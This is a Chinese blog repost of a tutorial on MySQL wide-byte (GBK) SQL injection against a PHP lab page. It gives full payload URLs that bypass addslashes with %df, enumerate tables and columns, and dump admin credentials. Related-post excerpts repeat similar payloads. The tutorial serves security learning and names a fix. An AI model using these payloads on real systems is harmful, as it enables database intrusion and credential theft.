mysql宽字节数_sql注入入门 之mysql宽字节注入

最新推荐文章于 2024-06-25 18:15:00 发布
最新推荐文章于 2024-06-25 18:15:00 发布
阅读量75 收藏
点赞数
文章标签: mysql宽字节数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39734184/article/details/113297724
版权

ea730b5d550e2c7164ddf5816375e043.gif

1,如下,宽字节注入的原型实例代码,注意连接字符集为gbk,对传入的值已用addslashes()做了转义,另外,php是把id当做一个字符串来接收的,后面在闭合的时候需要注意下,具体如下:

2582440895efe60763d6bee22472b88a.png

2,本此用于测试的 宽字节注入点,如下

http://192.168.3.23/wide/0x01/index.php?id=2

002665a4fd80e88314e3aff7510bc33f.png

3,这时当我们用经典的单引号尝试对传入参数进行干扰时发现,貌似并没有任何反应,原因很明显,因为addslashes()已经把我们提交的单引号给转义了

http://192.168.3.23/wide/0x01/index.php?id=2'

11cda7dae61a6dc6e5e827fd27110aaf.png

4,现在,我们就可以尝试利用宽字符来突破类似的转义问题,这里使用经典的%df宽字符,如下,页面返回数据库报错,说明我们的单引号已经被带入正常的sql语句中执行查询了,也就是说,用于转义的那个’\’已经罢工了

8fbf51577e0faadbcd10b24630bc7f15.png

5,通过观察打出来的sql语句,可以发现,那个 ‘%df’和’\’ 在gbk字符编码中变成了‘運’字,所以这才会造成转义才会失效,既如此,闭合自然就非常简单了,因为是字符型注入,只需要把前面的单引号闭合,后面的语句直接注释掉即可,具体的注入语句如下

http://192.168.3.23/wide/0x01/index.php?id=2%df'and 1=1 %23   条件为真时返回正常

8ce01151cb6abcd306798ffa74d1cf27.png

http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=12 %23 条件为真时返回异常

9f29fb29dd66d982a1ea6f98556e18fb.png

6,查询当前表的字段个数

http://192.168.3.23/wide/0x01/index.php?id=2%df' order by 3 %23 为3时返回正常

e914668e606a303406b4320bf05b0317.png

http://192.168.3.23/wide/0x01/index.php?id=2%df' order by 4 %23 为4时返回异常,说明当前表有3个字段

24cb77f6ba8d615c0d9cf2e515422be6.png

7,执行union,爆出对应的数据显示位

http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=21 UNION SELECT 1,2,3 %23

26abd7b824d024680c23e46a562dcd69.png

8,搜集当前数据库信息,这里只是为了给大家演示下宽字节的正常注入流程,就不再尝试读写文件了,暂时按照正常的权限来,有兴趣可自行尝试

http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=21 UNION SELECT 1,database(),version() %23

525396fecb5ec20a791fd798d327ac5b.png

9,查出当前库中的所有表名

http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=12 union select 1,group_concat(table_name),user() from information_schema.tables where table_schema=0x64617461 %23

9afd7f61712c598cebd3762cf7bd3e20.png

10,查出admin表中的所有字段名

http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=12 union select 1,group_concat(column_name),user() from information_schema.columns where table_name=0x61646d696e %23

31d17f89aea26eab32eb34df8db87583.png

11,最后,去查出管理的账号密码数据即可

http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=12 union select 1,name,pass from admin limit 0,1 %23

31003d070c89f08d163e1c0818231c88.png

一点小结:

篇幅原因,这里只简单演示了GBK一种编码,至于GB2312等其它的一些宽字节字符集,也都会有这样的问题,关于宽字节注入,其实原理非常简单,就是数据库对不同编码的理解差异所造成的,最好的修复方法,就是全站(前后端全局统一)统一用utf-8,在适当的闭合后,注入语句和常规的注入语句基本没有任何差别,记得多找实例练习即可

文章出处:klion's blog

原文链接:https://klionsec.github.io/2016/05/15/mysql-wide-byte-injection/

cdcb37927b4d707d64a9fa171392d075.png

ec67013a47e11fddd35b4549b5c810b2.png

weixin_39734184
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
宽字节注入
rane的博客
03-18 287
宽字节注入原理 宽字节注入方法 以第32关为例,输入单引号后会经过check_addslashes函数替换 数据库连接的时候使用的是gbk编码 http://127.0.0.1/Less-32/?id=1%df’ order by 3–+ 三列 http://127.0.0.1/Less-32/?id=-1%df’ union select 1,2,version()–+ 使用union查询需...
MYSQL 宽字节注入
AaronLuo
09-14 406
MYSQL使用了GBK编码会认为两个字符为一个汉字,所以可以使用一些字符和转义过后多出来的\组合两个字符,使得数据库不识别字符,对单引号、双引号的转义失败 宽字节注入的形成过程 当PHP连接MYSQL时,当设置character_set_client = gbk 时会导致GBK编码转换的问题,当注入的参数里带有%df(%bf)时,在魔术引号开关或者addslashes() 函数的作用下,会将%df...
浅析常见WEB安全漏洞及其防御措施_web漏洞防护
最新发布
Z4400840的博客
06-25 910
在网络攻防中,Web系统通常是攻击者的首选目标,攻击者大都通过Web打点的方式,先拿到边界Web服务器的权限,再以此为跳板实施内网横向渗透。由于Web系统通常涉及大量的用户数据和敏感信息,一旦受到攻击或破坏,可能造成数据泄露、服务中断等影响。相较于攻击方,Web系统也是防守方的重点防护对象。作为安全开发或安全运营人员,及早发现和修复潜在的WEB安全漏洞,不仅有助于提高互联网业务系统的稳定性,也能降低后期安全运营工作的压力和成本。【一一帮助安全学习,所有资源获取处一一】①网络安全学习路线。
MySQL 宽字节注入
m_de_g的博客
12-11 862
MySQL 宽字节注入 1.字节诸如基础 GBK占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码,MySQL默认字符集是GBK等字节字符集。 %DF':会被PHP当中的addslashes函数转义为"%DF","“既URL里的“%5C”,那也就是说,“%DF”会被转成“%DF%5C%27”倘若网站的字符集是GBK,MySQL使用的编码也是GBK的话,就会认为“%DF%5C%27”是一个字节。也就是”運'" URL在线解密工具链接: http://tool.chin
mysql sql宽字节注入_宽字节注入详解
weixin_28856341的博客
02-07 224
科普:宽字节注入详解在mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。作者:lxsec来源:网络安全***实验室|2014-04-08 16:0251CTO技术栈51CTO微站服务号51CTO学院客户端前言在mysql中,用...
mysql宽字节注入
m0_65096687的博客
04-09 169
宽字节注入的核心就是传一个字符是反斜杠成为有个汉字。在查表名的时候,会出现databse='表名'两个编码可能是两个字节,也有可能是有个字节。数据库使用GBK编码可能存在宽字节注入。因为魔术引号,遇到单引号就会加反斜杠转义。如果注入方式使post,就无法修改了。%df和\可以组成一个汉字,运。告诉系统这是16进制,而不是数字。,就会变成一个这样的字符串。直接把表名编译为16进制。需要让别人知道这是16进制。因为有了魔术引号的防御。MySQL支持16进制。但是16进制是一窜数字。汉字变成ascii数字。
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
php mysql_real_escape_string、addslashes函数以及mysql绑定参数是PHP开发中常用的防止SQL注入攻击的三种主要方法。 mysql_real_escape_string函数是PHP中的一个函数,用于转义SQL语句中使用的字符串中的特殊字符...
第十九节 字节SQL注入-01
09-15
字节SQL注入基础知识点总结 字节SQL注入是一种特殊类型的SQL注入攻击,主要针对使用字节字符集(如GBK、UTF-16等)的数据库管理系统。字节SQL注入攻击的关键在于exploit字节字符集的特性来 bypass 数据库...
PHP+mysql防止SQL注入的方法小结
10-17
在PHP和MySQL的开发中,SQL注入是一种常见的安全威胁。攻击者通过在输入字段中插入恶意的SQL代码,试图破坏应用程序的数据库查询,从而达到盗取数据、篡改数据甚至控制数据库服务器的目的。为了解决这个问题,我们...
MYSQL.rar_SQL分线程_SQL多线程_key5ad_mysql是多线程_replacer4s
09-24
MySQL是一个真正的多用户、多线程SQL数据库服务器。SQL(结构化查询语言)是世界上最流行的和标准化的数据库语言。MySQL是以一个客户机/服务器结构的实现,它由一个服务器守护程序mysqld和很多不同的客户程序和库...
MySQL一个语句查出各种整形占用字节数及最大最小值的实例
01-21
直接上码: select 'bigint unsigned' as type ,'8' as bytes ,~0 as max_num,0 as min_num union select 'int unsigned','4',~0>>32,0 union select 'mediumint unsigned','3',~0>>40,0 union ...
MYSQL注入之宽字节注入
cj_Hydra's Blog
04-16 462
一、经典sql注入漏洞 当前例子1中并没有对$_GET[‘name’]的值进行过滤,所以是存在sql注入漏洞的。 <?php $name=$_GET['name']; $conn=mysql_connect('localhost','root','root'); if($conn==null){exit("connect error !<br>");} mysql...
MYSQL注入-宽字节注入
告白的博客
08-02 443
0x00 宽字节注入简介 什么是字节: GB2312、GBK、GB18030、BIG5、Shift_JIS这些编码类型都是属于字节,当我们输入的单个字符被转换成ACSII码,当两个ACSII码组合起来会被字节再次编码为特殊文字等类型,即绕过了检验。宽字节注入mysql特有的一种诸注入类型 0x01 宽字节注入案例-SQLI-less-32 尝试判断闭合,发现输入的参数都被转换为ACSII码, 发现单引号被转换为通过查询ACSII码 单引号转换 /’ 而/‘换成 5c27 查询到
MySQL注入 -- 宽字节注入
weixin_41489908的博客
05-21 1795
​很多事情,原来努力了,也得不到满意的结果。。。 ---- 网易云热评 一、宽字节注入介绍 1、在注入点输入(')会被转义为(\')编码后为(%5c%27),只有把斜杆去掉才能注入 2、GBK编码表,%DF%5C正好组成(運),所以会把\"吃掉",0X81-0XFE都可以 二、实例演示 1、获取数据库名称 http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,database() --+ ...
mysql sql宽字节注入_SQL注入宽字节注入
weixin_36173034的博客
02-07 367
About SQL Injection宽字节注入0x01 前言对于SQL注入,我估计搞安全的都玩的滚瓜烂熟了,搞站什么的都是分分钟来的,但是之前做了一道宽字节注入的题目,又打开了我一扇通往新世界的大门(PS:早都碰到过,只不过一直没有时间写)。0x02 字节和mysql单字节字符集: 所有的字符都使用一个字节来表示,比如 ASCII 编码。多字节字符集: 在多字节字符集中,一部分字节用多个字节来...
mysql sql宽字节注入_SQL注入--宽字节注入
weixin_34940781的博客
02-07 77
PHP测试代码:// 面向对象写法$id=addslashes($_GET[‘id’]); //获取id并转义预定义字符// /$id=$_GET[‘id’];$mysqli=new mysqli(‘localhost’,’root’,’root’,’test’); //连接数据库 指定数据库if ($mysqli->connect_errno) { //判断错误信息die(‘Connect...
mysql sql宽字节注入_Mysql宽字节注入(转)
weixin_34550241的博客
01-18 95
尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本。我们就以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要注意...
MySQL宽字节注入漏洞分析_宽字节注入
weixin_29791743的博客
02-27 205
概念单字节字符集: 所有的字符都使用一个字节来表示,比如 ASCII 编码。多字节字符集: 在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示。两位的多字节字符有一个前导字节和尾字节。 在某个多字节字符集内,前导字节位于某个特定范围内,尾字节也一样。UTF-8 编码: 是一种编码的编码方式(多字节编码),它可以使用1~4个字节表示一个符号,根据不同的符号而变化字节长...
MySQL练习:注入语句详解与宽字节注入
宽字节注入通常发生在服务器使用多字节字符集(如GBK)时。攻击者通过插入特殊字符来改变SQL语句的解释。例如,可以使用%df来处理转义字符',使其失效,如`' or 'a'='a%df'`。 - 条件:目标程序使用双/多字节字符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值